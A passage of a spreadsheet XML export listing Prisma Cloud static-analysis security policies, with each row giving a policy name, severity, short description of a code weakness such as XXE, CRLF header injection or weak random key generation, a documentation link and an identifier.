      </c>
      <c r="Q338" t="inlineStr"/>
      <c r="R338" t="inlineStr"/>
      <c r="S338" t="inlineStr"/>
      <c r="T338" t="b">
        <v>0</v>
      </c>
      <c r="U338" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V338" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W338" t="inlineStr">
        <is>
          <t>Error messages with may expose sensitive information about the application.</t>
        </is>
      </c>
      <c r="X338" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-179</t>
        </is>
      </c>
      <c r="Y338" t="inlineStr"/>
      <c r="Z338" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA338" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB338" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC338" t="inlineStr">
        <is>
          <t>CKV3_SAST_179</t>
        </is>
      </c>
      <c r="AD338" t="b">
        <v>1</v>
      </c>
      <c r="AE338" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF338" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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 t="inlineStr">
        <is>
          <t>099e685d-8ef7-4fa5-80b8-feba25be153b</t>
        </is>
      </c>
      <c r="AI338" t="inlineStr"/>
      <c r="AJ338" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK338" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" t="inlineStr"/>
      <c r="B339" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C339" s="2" t="inlineStr"/>
      <c r="D339" t="inlineStr"/>
      <c r="E339" t="inlineStr"/>
      <c r="F339" t="inlineStr"/>
      <c r="G339" t="b">
        <v>1</v>
      </c>
      <c r="H3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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J339" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K339" t="inlineStr">
        <is>
          <t>Unsafe use of hazelcast symmetric encryption</t>
        </is>
      </c>
      <c r="L339" t="inlineStr"/>
      <c r="M339" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N339" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O339" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P339" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q339" t="inlineStr"/>
      <c r="R339" t="inlineStr"/>
      <c r="S339" t="inlineStr"/>
      <c r="T339" t="b">
        <v>0</v>
      </c>
      <c r="U339" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V339" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W339" t="inlineStr">
        <is>
          <t>The network communications for Hazelcast is configured to use a symmetric cipher (probably DES or Blowfish). Those ciphers alone do not provide integrity or secure authentication. The use of asymmetric encryption is preferred.</t>
        </is>
      </c>
      <c r="X339" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-15</t>
        </is>
      </c>
      <c r="Y339" t="inlineStr"/>
      <c r="Z339" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA339" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB339" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC339" t="inlineStr">
        <is>
          <t>CKV3_SAST_15</t>
        </is>
      </c>
      <c r="AD339" t="b">
        <v>1</v>
      </c>
      <c r="AE339" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF339" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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 t="inlineStr">
        <is>
          <t>a9cc743c-e2d8-4ba5-8253-3a10594ae897</t>
        </is>
      </c>
      <c r="AI339" t="inlineStr"/>
      <c r="AJ339" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK339" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" t="inlineStr"/>
      <c r="B340" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C340" s="2" t="inlineStr"/>
      <c r="D340" t="inlineStr"/>
      <c r="E340" t="inlineStr"/>
      <c r="F340" t="inlineStr"/>
      <c r="G340" t="b">
        <v>1</v>
      </c>
      <c r="H3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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J340" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K340" t="inlineStr">
        <is>
          <t>Unprotected SAX parser with user input</t>
        </is>
      </c>
      <c r="L340" t="inlineStr"/>
      <c r="M340" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N340" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O340" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P340" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q340" t="inlineStr"/>
      <c r="R340" t="inlineStr"/>
      <c r="S340" t="inlineStr"/>
      <c r="T340" t="b">
        <v>0</v>
      </c>
      <c r="U340" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V340" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W340" t="inlineStr">
        <is>
          <t>External XML entities are a feature of XML parsers that allow documents to contain references to other documents or data. This feature can be abused to read files, communicate with external hosts, exfiltrate data, or cause a Denial of Service (DoS). It is recommended that the `SAXParser` is configured to disable DTD doctypes as this protects against the majority of XXE attacks.</t>
        </is>
      </c>
      <c r="X340" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-127</t>
        </is>
      </c>
      <c r="Y340" t="inlineStr"/>
      <c r="Z340" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA340" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB340" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC340" t="inlineStr">
        <is>
          <t>CKV3_SAST_127</t>
        </is>
      </c>
      <c r="AD340" t="b">
        <v>1</v>
      </c>
      <c r="AE340" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF340" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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 t="inlineStr">
        <is>
          <t>f17b1a03-5409-412f-adc2-fba20dd58391</t>
        </is>
      </c>
      <c r="AI340" t="inlineStr"/>
      <c r="AJ340" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK340" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" t="inlineStr"/>
      <c r="B341" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C341" s="2" t="inlineStr"/>
      <c r="D341" t="inlineStr"/>
      <c r="E341" t="inlineStr"/>
      <c r="F341" t="inlineStr"/>
      <c r="G341" t="b">
        <v>1</v>
      </c>
      <c r="H3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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J341" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K341" t="inlineStr">
        <is>
          <t>Improper authentication</t>
        </is>
      </c>
      <c r="L341" t="inlineStr"/>
      <c r="M341" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N341" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O341" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P341" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q341" t="inlineStr"/>
      <c r="R341" t="inlineStr"/>
      <c r="S341" t="inlineStr"/>
      <c r="T341" t="b">
        <v>0</v>
      </c>
      <c r="U341" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V341" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W341" t="inlineStr">
        <is>
          <t>SAML's XML parsing can be manipulated using XML comments, potentially allowing attackers to disrupt attestation fields and bypass security checks. To prevent this, when using org.opensaml.xml.parse.BasicParserPool, invoke setIgnoreComments(true).</t>
        </is>
      </c>
      <c r="X341" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-109</t>
        </is>
      </c>
      <c r="Y341" t="inlineStr"/>
      <c r="Z341" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA341" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB341" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC341" t="inlineStr">
        <is>
          <t>CKV3_SAST_109</t>
        </is>
      </c>
      <c r="AD341" t="b">
        <v>1</v>
      </c>
      <c r="AE341" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF341" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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 t="inlineStr">
        <is>
          <t>8f1349e1-c0d8-4b4b-bf3d-47136d03c6b6</t>
        </is>
      </c>
      <c r="AI341" t="inlineStr"/>
      <c r="AJ341" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK341" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" t="inlineStr"/>
      <c r="B342" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C342" s="2" t="inlineStr"/>
      <c r="D342" t="inlineStr"/>
      <c r="E342" t="inlineStr"/>
      <c r="F342" t="inlineStr"/>
      <c r="G342" t="b">
        <v>1</v>
      </c>
      <c r="H3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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J342" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K342" t="inlineStr">
        <is>
          <t>RSA keys should be at least 2048 bits</t>
        </is>
      </c>
      <c r="L342" t="inlineStr"/>
      <c r="M342" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N342" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O342" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P342" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q342" t="inlineStr"/>
      <c r="R342" t="inlineStr"/>
      <c r="S342" t="inlineStr"/>
      <c r="T342" t="b">
        <v>0</v>
      </c>
      <c r="U342" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V342" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W342" t="inlineStr">
        <is>
          <t>Use more than 2048 bits for RSA keys</t>
        </is>
      </c>
      <c r="X342" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-200</t>
        </is>
      </c>
      <c r="Y342" t="inlineStr"/>
      <c r="Z342" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA342" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB342" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC342" t="inlineStr">
        <is>
          <t>CKV3_SAST_200</t>
        </is>
      </c>
      <c r="AD342" t="b">
        <v>1</v>
      </c>
      <c r="AE342" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF342" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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 t="inlineStr">
        <is>
          <t>46e1537f-6d6e-4221-8a14-512f9b87616e</t>
        </is>
      </c>
      <c r="AI342" t="inlineStr"/>
      <c r="AJ342" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK342" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" t="inlineStr"/>
      <c r="B343" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C343" s="2" t="inlineStr"/>
      <c r="D343" t="inlineStr"/>
      <c r="E343" t="inlineStr"/>
      <c r="F343" t="inlineStr"/>
      <c r="G343" t="b">
        <v>1</v>
      </c>
      <c r="H3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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J343" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K343" t="inlineStr">
        <is>
          <t>Usage of weak random key generation</t>
        </is>
      </c>
      <c r="L343" t="inlineStr"/>
      <c r="M343" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N343" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O343" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P343" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q343" t="inlineStr"/>
      <c r="R343" t="inlineStr"/>
      <c r="S343" t="inlineStr"/>
      <c r="T343" t="b">
        <v>0</v>
      </c>
      <c r="U343" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V343" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W343" t="inlineStr">
        <is>
          <t>This policy identifies the use of Go's math/rand package for generating random numbers in contexts that require cryptographic security. The math/rand package is not suitable for cryptographic or security-sensitive contexts, such as generating user-specific identifiers or secret random numbers. It is recommended to replace all imports of math/rand with crypto/rand to ensure the use of a cryptographically secure random number generator.</t>
        </is>
      </c>
      <c r="X343" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-248</t>
        </is>
      </c>
      <c r="Y343" t="inlineStr"/>
      <c r="Z343" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA343" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB343" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC343" t="inlineStr">
        <is>
          <t>CKV3_SAST_248</t>
        </is>
      </c>
      <c r="AD343" t="b">
        <v>1</v>
      </c>
      <c r="AE343" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF343" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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 t="inlineStr">
        <is>
          <t>f1bbdf29-bb49-44d8-9857-79f5d9e720d8</t>
        </is>
      </c>
      <c r="AI343" t="inlineStr"/>
      <c r="AJ343" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK343" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" t="inlineStr"/>
      <c r="B344" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C344" s="2" t="inlineStr"/>
      <c r="D344" t="inlineStr"/>
      <c r="E344" t="inlineStr"/>
      <c r="F344" t="inlineStr"/>
      <c r="G344" t="b">
        <v>1</v>
      </c>
      <c r="H3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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J344" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K344" t="inlineStr">
        <is>
          <t>Improper control of external configuration inputs leading to potential code injection</t>
        </is>
      </c>
      <c r="L344" t="inlineStr"/>
      <c r="M344" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N344" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O344" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P344" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q344" t="inlineStr"/>
      <c r="R344" t="inlineStr"/>
      <c r="S344" t="inlineStr"/>
      <c r="T344" t="b">
        <v>0</v>
      </c>
      <c r="U344" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V344" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W344" t="inlineStr">
        <is>
          <t>The logging.config.listen function listens for config files via a socket server,  but its use of eval() poses security risks. Although it binds to localhost and  doesn't accept remote connections, untrusted code could run under the process's  account. It offers options for byte verification, signature validation, and  encryption.</t>
        </is>
      </c>
      <c r="X344" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-168</t>
        </is>
      </c>
      <c r="Y344" t="inlineStr"/>
      <c r="Z344" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA344" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB344" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC344" t="inlineStr">
        <is>
          <t>CKV3_SAST_168</t>
        </is>
      </c>
      <c r="AD344" t="b">
        <v>1</v>
      </c>
      <c r="AE344" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF344" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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 t="inlineStr">
        <is>
          <t>6ab67838-057a-4aac-bbc6-55d2a0e3faf1</t>
        </is>
      </c>
      <c r="AI344" t="inlineStr"/>
      <c r="AJ344" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK344" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" t="inlineStr"/>
      <c r="B345" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C345" s="2" t="inlineStr"/>
      <c r="D345" t="inlineStr"/>
      <c r="E345" t="inlineStr"/>
      <c r="F345" t="inlineStr"/>
      <c r="G345" t="b">
        <v>1</v>
      </c>
      <c r="H3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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J345" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K345" t="inlineStr">
        <is>
          <t>Uncontrolled Resource Consumption</t>
        </is>
      </c>
      <c r="L345" t="inlineStr"/>
      <c r="M345" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N345" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O345" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P345" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q345" t="inlineStr"/>
      <c r="R345" t="inlineStr"/>
      <c r="S345" t="inlineStr"/>
      <c r="T345" t="b">
        <v>0</v>
      </c>
      <c r="U345" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V345" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W345" t="inlineStr">
        <is>
          <t>Requests call without timeout can cause your program to hang indefinitely.</t>
        </is>
      </c>
      <c r="X345" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-91</t>
        </is>
      </c>
      <c r="Y345" t="inlineStr"/>
      <c r="Z345" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA345" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB345" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC345" t="inlineStr">
        <is>
          <t>CKV3_SAST_91</t>
        </is>
      </c>
      <c r="AD345" t="b">
        <v>1</v>
      </c>
      <c r="AE345" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF345" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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5" t="inlineStr">
        <is>
          <t>49979d08-acc0-488f-aeee-323bde47c742</t>
        </is>
      </c>
      <c r="AI345" t="inlineStr"/>
      <c r="AJ345" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK345" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" t="inlineStr"/>
      <c r="B346" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C346" s="2" t="inlineStr"/>
      <c r="D346" t="inlineStr"/>
      <c r="E346" t="inlineStr"/>
      <c r="F346" t="inlineStr"/>
      <c r="G346" t="b">
        <v>1</v>
      </c>
      <c r="H3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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J346" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K346" t="inlineStr">
        <is>
          <t>Enforce HTTPS Access for S3 Buckets</t>
        </is>
      </c>
      <c r="L346" t="inlineStr"/>
      <c r="M346" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N346" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O346" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P346" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q346" t="inlineStr"/>
      <c r="R346" t="inlineStr"/>
      <c r="S346" t="inlineStr"/>
      <c r="T346" t="b">
        <v>0</v>
      </c>
      <c r="U346" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V346" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W346" t="inlineStr">
        <is>
          <t>Ensure S3 buckets are accessed exclusively via HTTPS. By default, S3 buckets are accessible via both HTTP and HTTPS, but the former poses a security risk as it's a clear-text protocol. Enforcing HTTPS ensures encryption during transport and avoids potential malicious interceptions.</t>
        </is>
      </c>
      <c r="X346" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-80</t>
        </is>
      </c>
      <c r="Y346" t="inlineStr"/>
      <c r="Z346" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA346" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB346" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC346" t="inlineStr">
        <is>
          <t>CKV3_SAST_80</t>
        </is>
      </c>
      <c r="AD346" t="b">
        <v>1</v>
      </c>
      <c r="AE346" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF346" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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6" t="inlineStr">
        <is>
          <t>ddd271a0-826c-487c-b9ac-44f154f69f0f</t>
        </is>
      </c>
      <c r="AI346" t="inlineStr"/>
      <c r="AJ346" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK346" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" t="inlineStr"/>
      <c r="B347" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C347" s="2" t="inlineStr"/>
      <c r="D347" t="inlineStr"/>
      <c r="E347" t="inlineStr"/>
      <c r="F347" t="inlineStr"/>
      <c r="G347" t="b">
        <v>1</v>
      </c>
      <c r="H3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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J347" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K347" t="inlineStr">
        <is>
          <t>Exposure to tainted data in headers leading to potential CRLF injection</t>
        </is>
      </c>
      <c r="L347" t="inlineStr"/>
      <c r="M347" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N347" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O347" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P347" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q347" t="inlineStr"/>
      <c r="R347" t="inlineStr"/>
      <c r="S347" t="inlineStr"/>
      <c r="T347" t="b">
        <v>0</v>
      </c>
      <c r="U347" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V347" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W347" t="inlineStr">
        <is>
          <t>use of setHeader and addHeader with tainted data</t>
        </is>
      </c>
      <c r="X347" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-118</t>
        </is>
      </c>
      <c r="Y347" t="inlineStr"/>
      <c r="Z347" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA347" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB347" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC347" t="inlineStr">
        <is>
          <t>CKV3_SAST_118</t>
        </is>
      </c>
      <c r="AD347" t="b">
        <v>1</v>
      </c>
      <c r="AE347" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF347" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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7" t="inlineStr">
        <is>
          <t>256f51c2-60a0-4e9e-8ec9-67226e494106</t>
        </is>
      </c>
      <c r="AI347" t="inlineStr"/>
      <c r="AJ347" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK347" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" t="inlineStr"/>
      <c r="B348" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C348" s="2" t="inlineStr"/>
      <c r="D348" t="inlineStr"/>
      <c r="E348" t="inlineStr"/>
      <c r="F348" t="inlineStr"/>
      <c r="G348" t="b">
        <v>1</v>
      </c>
      <c r="H3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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J348" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K348" t="inlineStr">
        <is>
          <t>Unsafe custom MessageDigest is implemented</t>
        </is>
      </c>
      <c r="L348" t="inlineStr"/>
      <c r="M348" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N348" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O348" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P348" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q348" t="inlineStr"/>
      <c r="R348" t="inlineStr"/>
      <c r="S348" t="inlineStr"/>
      <c r="T348" t="b">
        <v>0</v>
      </c>
      <c r="U348" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V348" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W348" t="inlineStr">
        <is>
          <t>Implementing a custom MessageDigest is error-prone. National Institute of Standards and Technology(NIST) recommends the use of SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, or SHA-512/256.</t>
        </is>
      </c>
      <c r="X348" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-13</t>
        </is>
      </c>
      <c r="Y348" t="inlineStr"/>
      <c r="Z348" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA348" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB348" t="inlineStr">
